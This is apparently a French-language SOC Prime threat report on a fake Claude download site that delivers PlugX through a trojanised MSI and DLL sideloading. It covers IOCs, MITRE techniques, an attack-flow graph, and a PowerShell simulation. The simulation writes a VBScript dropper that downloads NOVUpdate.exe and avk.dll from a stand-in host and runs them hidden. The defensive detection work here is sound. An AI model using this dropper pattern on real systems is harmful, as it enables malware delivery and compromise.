Un faux site Claude installe un logiciel malveillant donnant accès à votre ordinateur aux attaquants

SOC Prime Team

Suivre

Un faux site Claude installe un logiciel malveillant donnant accès à votre ordinateur aux attaquants

Detection stack

AIDR
Alert
ETL
Query

Rapport
Flux d'Attaque
Détections
Simulations

Résumé

Les attaquants ont mis en place une fausse page de téléchargement de Claude qui distribue une archive ZIP trojanisée aux utilisateurs imprudents. Une fois ouverte, l’archive installe un client de bureau Claude apparemment légitime tout en déployant secrètement le cheval de Troie PlugX via le chargement de DLL avec un programme de mise à jour G DATA signé. La charge malveillante était placée dans le dossier de démarrage de l’utilisateur pour maintenir la persistance, puis initiait une communication HTTPS sortante avec un serveur de commande et de contrôle. La campagne montre comment les acteurs de la menace exploitent de plus en plus l’intérêt pour les outils d’IA populaires comme appât d’ingénierie sociale pour compromettre initialement.

Investigation

Lors de l’analyse, les chercheurs ont décompressé l’archive ZIP, identifié le chemin d’installation MSI et ont suivi l’exécution vers un dropper VBScript qui écrivait NOVUpdate.exe, un avk.dll, et un fichier de données chiffré dans le dossier de démarrage. L’exécution dans un bac à sable a confirmé que le binaire chargé avec une charge réussissait à se lancer, modifiait une clé de registre liée au TCP/IP et initiait des connexions sortantes sur le port 443 vers une adresse IP hébergée par Alibaba Cloud. Ces découvertes ont confirmé la livraison de PlugX via une chaîne d’infection mise en scène déguisée en logiciel légitime d’IA.

Atténuation

Les utilisateurs doivent télécharger le logiciel Claude uniquement à partir de sources officielles vérifiées et valider l’authenticité des paquets d’installation avant l’exécution. Les défenseurs doivent inspecter les dossiers de démarrage pour rechercher des binaire ou DLL inattendus, en particulier les fichiers qui imitent des composants de mise à jour légitimes. Les télémetries de pare-feu et d’endpoint doivent également être examinées pour détecter le trafic HTTPS sortant suspect lié à des applications nouvellement installées. Supprimer les fichiers malveillants, inverser les modifications de registre non autorisées et effectuer un scan anti-malware de confiance sont des étapes clés pour contenir la menace.

Réponse

Les équipes de sécurité devraient détecter et alerter sur la présence de NOVUpdate.exe, avk.dll, ou NOVUpdate.exe.dat dans le répertoire de démarrage. Les détections supplémentaires devraient se concentrer sur les binaires de mise à jour G DATA signés chargeant des DLL non fiables et établissant des sessions TLS sortantes inattendues vers l’infrastructure identifiée. Les hôtes concernés devraient faire l’objet d’une remédiation complète et d’un examen forensique pour s’assurer qu’aucun autre composant PlugX, mécanisme de persistance ou charge utile ultérieure ne reste actif.

graph TB %% Class definitions classDef technique fill:#ffdd99 classDef file fill:#c2f0c2 classDef script fill:#d9d9ff classDef process fill:#f0c2c2 classDef persistence fill:#ffd9b3 classDef c2 fill:#b3e5fc classDef evasion fill:#e6b3ff classDef registry fill:#ffe699 %% Nodes u2013 Files and Artifacts node_spoofed_website[« Fichier – Faux site Claude Héberge un ZIP malveillant »]:::file node_malicious_zip[« Fichier – ZIP malveillant Contient un installateur MSI trojanisé »]:::file node_msi_installer[« Fichier – Installateur MSI trojanisé »]:::file node_vbscript[« Script – Claude AI.vbs Copie des fichiers, lance Claude, établit la persistance »]:::script node_novupdate_exe[« Fichier – NOVUpdate.exe Mise à jour légitime G DATA utilisée pour DLL sideloading »]:::file node_avk_dll[« Fichier – avk.dll DLL malveillante chargée par le programme de mise à jour »]:::file node_dat_file[« Fichier – NOVUpdate.exe.dat Charge utile chiffrée »]:::file node_startup_folder[« Fichier – Dossier de démarrage Destination des fichiers copiés »]:::file node_shortcut[« Fichier – Claude AI.lnk Raccourci qui exécute le VBScript »]:::file node_cleanup_batch[« Fichier – cleanup.bat Supprime les artefacts malveillants »]:::file node_registry_key[« Registre – HKLM\System\CurrentControlSet\Services\Tcpip\Parameters »]:::registry %% Nodes u2013 Techniques node_initial_access[« Technique – T1204.002 Exécution utilisateur La victime télécharge un ZIP et exécute un MSI »]:::technique node_execution[« Technique – T1059.005 Visual Basic Exécute un VBScript malveillant »]:::technique node_persistence_startup[« Technique – T1037.005 Éléments de démarrage Copie des fichiers dans le dossier de démarrage »]:::persistence node_persistence_shortcut[« Technique – T1547.009 Modification de raccourcis Crée et remplace un raccourci »]:::persistence node_appcert_dll[« Technique – T1546.009 AppCert DLL DLL sideloading via G DATA »]:::evasion node_obfuscation[« Technique – T1027.009 Fichiers obfusqués Charge utile .dat déchiffrée à l’exécution »]:::evasion node_registry_mod[« Technique – T1012 Interrogation du registre Modifie les paramètres TCP/IP »]:::registry node_c2_proxy[« Technique – T1090.002 Proxy externe HTTPS via proxy externe »]:::c2 node_c2_web[« Technique – T1102 Service web Communication HTTPS »]:::c2 node_indicator_removal[« Technique – T1070.010 Suppression d’indicateurs Script batch supprime le dropper et lui-même »]:::evasion %% Flow Connections node_spoofed_website –>|hosts| node_malicious_zip node_malicious_zip –>|delivered via| node_msi_installer node_msi_installer –>|drops| node_vbscript node_msi_installer –>|drops| node_novupdate_exe node_msi_installer –>|drops| node_avk_dll node_msi_installer –>|drops| node_dat_file node_initial_access –>|leads to| node_msi_installer node_vbscript –>|executes| node_execution node_execution –>|enables| node_persistence_startup node_execution –>|creates| node_shortcut node_persistence_startup –>|copies to| node_startup_folder node_startup_folder –>|contains| node_novupdate_exe node_startup_folder –>|contains| node_avk_dll node_startup_folder –>|contains| node_dat_file node_persistence_shortcut –>|creates| node_shortcut node_persistence_shortcut –>|replaces with clean| node_shortcut node_appcert_dll –>|loads| node_avk_dll node_obfuscation –>|decrypts| node_dat_file node_registry_mod –>|modifies| node_registry_key node_c2_proxy –>|uses| node_c2_web node_indicator_removal –>|creates| node_cleanup_batch node_cleanup_batch –>|deletes| node_vbscript node_cleanup_batch –>|deletes| node_msi_installer %% Class Assignments class node_initial_access technique class node_execution technique class node_persistence_startup persistence class node_persistence_shortcut persistence class node_appcert_dll evasion class node_obfuscation evasion class node_registry_mod registry class node_c2_proxy c2 class node_c2_web c2 class node_indicator_removal evasion

Flux du’Attaque

Narrative d’attaque et commandes :
Un attaquant crée un script VBS malveillant qui télécharge la charge utile NOVUpdate.exe depuis un serveur de commande et de contrôle (C2), l’écrit à %TEMP%et la lance ensuite via wscript.exe. Le même script charge également avk.dll depuis le même emplacement pour réaliser le chargement par DLL. L’attaquant utilise l’hôte de script Windows (WSH) intégré pour éviter de susciter les soupçons des heuristiques AV traditionnelles.
1. Écrire le fichier VBS malveillant (malicious.vbs) vers %TEMP%.
2. Invoquer wscript.exe avec le chemin vers le fichier VBS.
3. Le script VBS effectue un HTTP GET pour récupérer NOVUpdate.exe and avk.dll, les écrit sur le disque, et exécute NOVUpdate.exe.

Script de test de régression :

# --------------------------------------------------------------------
# Simulation de dropper malveillant – déclenche la règle Sigma
# --------------------------------------------------------------------
$tempDir = "$env:TEMPDropperDemo"
New-Item -ItemType Directory -Path $tempDir -Force | Out-Null

# 1. Créer un VBS malveillant qui télécharge deux fichiers et exécute NOVUpdate.exe
$vbsPath = "$tempDirmalicious.vbs"
$vbsContent = @"
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.open "GET", "http://example.com/NOVUpdate.exe", False
objXML.send
If objXML.Status = 200 Then
Set objStream = CreateObject("ADODB.Stream")
objStream.Type = 1
objStream.Open
objStream.Write objXML.ResponseBody
objStream.SaveToFile "$tempDirNOVUpdate.exe", 2
objStream.Close
End If

‘ Télécharger avk.dll (utilisé pour le chargement par DLL) objXML.open « GET », « http://example.com/avk.dll« , False objXML.send If objXML.Status = 200 Then Set objStream = CreateObject(« ADODB.Stream ») objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile « $tempDiravk.dll », 2 objStream.Close End If

‘ Exécuter l’EXE déposé CreateObject(« WScript.Shell »).Run « » »$tempDirNOVUpdate.exe » » », 0, False « @ Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII

# 2. Exécuter le script via wscript.exe (c'est la télémetrie que nous testons)
$wscript = "$env:SystemRootSystem32wscript.exe"
Start-Process -FilePath $wscript -ArgumentList "`"$vbsPath`"" -WindowStyle Hidden

# OPTIONNEL : pause pour permettre à la détection de se déclencher
Start-Sleep -Seconds 10
# --------------------------------------------------------------------

Commandes de nettoyage :

# Supprimer tous les artefacts générés par la simulation
$tempDir = "$env:TEMPDropperDemo"
if (Test-Path $tempDir) {
    Remove-Item -Path $tempDir -Recurse -Force
}

# S'assurer que tous les processus NOVUpdate.exe restants sont terminés
Get-Process -Name "NOVUpdate" -ErrorAction SilentlyContinue | Stop-Process -Force

Rejoignez la plateforme Detection as Code de SOC Prime pour améliorer la visibilité sur les menaces les plus pertinentes pour votre entreprise. Pour vous aider à démarrer et à générer une valeur immédiate, planifiez dès maintenant une réunion avec des experts de SOC Prime.

Rejoindre gratuitement